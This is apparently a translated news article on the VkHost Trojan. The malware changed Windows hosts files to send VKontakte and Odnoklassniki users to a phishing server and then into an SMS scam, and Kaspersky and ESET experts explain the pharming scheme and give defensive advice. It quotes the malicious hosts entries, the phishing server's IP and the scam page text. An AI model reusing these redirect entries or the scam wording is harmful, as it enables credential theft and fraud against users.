The Trojan works according to the following principle: it modifies the hosts file (located at C: \ WINDOWS \ system32 \ drivers \ etc \) in such a way that when a user tries to access his favorite social network, his computer browser opens a twin site; As a result, the email address and password are added to the stolen accounts database immediately after being entered on a fake resource.

The 4.2 MB file contains tens of thousands of valid addresses and passwords. Initially, 130 or even 150 thousand hacked accounts were reported, but by discarding repeated combinations, we found out that there are two to two and a half times less of them. (Which, however, is also impressive.) It is also known that in the near future users of the Odnoklassniki network may come under attack: hackers have already created a corresponding file for their data, but it is currently empty.

We asked specialists from antivirus development companies to comment on the situation, as well as talk about such attacks.

Denis Maslennikov, antivirus expert at Kaspersky Lab: Data is now freely available accounts more than 130 thousand users of the popular Russian social network VKontakte. The information was published on one of the hacker sites. Our experts have analyzed this data and confirmed the fact of compromise. According to our information, the incident looks like this: the site specified in the message - 83.133.120.252 - is known to Kaspersky Lab as a phishing site and is blocked when personal products try to access it.

The malicious program Trojan.Win32.VkHost.an (detected by us since July 28) was distributed via the VKontakte application (hxxp: //vkontakte.ru/app711384? & M = 2, currently blocked by the resource administration). After being installed on the system, this Trojan replaced the hosts file with the following:
83.133.120.252 vkontakte.ru
83.133.120.252 odnoklassniki.ru

Then, when the user tried to open the site of one of these social networks, he was redirected to a phishing page, where he had to log in. Login and password went to the databases on the same site 83.133.120.252. At the moment, the database of "classmates" is empty, so it is too early to talk about the compromise of user data and this social network.

After the user logged into the fake page, a redirect took place - first to a new page. This page contains the following text:

« ATTENTION! Your account has been identified by the system as potentially dangerous. Spam is being sent from your IP address. The account is recognized as a fake, created by cybercriminals for spam mailings, and will be deleted 24 hours after reading this notice, in case of refusal to confirm the account. If the account is real, it must be verified. Send SMS with the text orderit30193 (without spaces), to number 6008 you will receive an Activation Code in return SMS. The cost of SMS corresponds to the cost according to your tariff plan.»

What is most interesting, if a user sends an SMS, then he really receives a certain code, since the site contains pages with the following content:

« Code accepted! Download and run the file - Download.»

« You entered an incorrect code. Come back and enter the code from the sms message!»

We recommend all users of VKontakte and Odnoklassniki to check the contents of their hosts files, which are located in the% windir% \ system32 \ drivers \ etc directory, and if they contain links to vkontakte.ru and odnoklassniki.ru, delete them.

Be sure to change all passwords for all accounts in in social networks... If you get on such phishing pages, in no case enter your username and password and do not send any SMS messages.

Attackers often use hosts file spoofing to redirect users to phishing web pages. Unfortunately, this primitive method sometimes bears fruit for criminals. If we talk about such schemes of attacks on online banking users, then they are the most popular in Latin America.

Grigory Vasiliev, technical director of ESET: Access to vkontakte.ru accounts was obtained using a pharming attack - redirecting the victim to a false IP address by making changes to the hosts file. The user is taken to a fake page created by the attacker, and the latter intercepts the passwords to his accounts... At the same time, the victim may not be aware of anything, since the outwardly fake page is no different from the real one.

These attacks are most often used where real money is involved. Therefore, the most widespread use of pharming is in online banking. Modern antivirus products that use HIPS technologies in combination with heuristic analysis can effectively protect users from malware trying to modify the hosts file, even if it is a new unknown threat.

Addition: Apparently, the VKontakte employees forcibly changed the passwords for all the “lucky ones”. This step is undoubtedly correct with one caveat: it does not completely solve the problem. After all, many of us come up with only one password for all occasions, and if so, the owners of the file with the base have the widest scope for experiments ...

Appendix 2: Kaspersky Lab invites users of the social networks VKontakte and Odnoklassniki to check whether their registration data has ended up in the hands of intruders. This can be done on a special page of the company's information portal. Let the VKontakte employees change the passwords of the affected users, it is still worth finding out if your address is in the database (which, by the way, is not available at its old address at the moment).

If the answer is yes, you need to clean the hosts file and arrange a total anti-virus scan of your PC. And one more thing: if you have used the same password on all the resources you visit - social networks, postal services, ICQ, and so on, you urgently need to change it. There may be much more people who want to take over the rest of your accounts (for example, by trying to enter your old password from VKontakte on Odnoklassniki) than it seems.

Share with friends:
Similar publications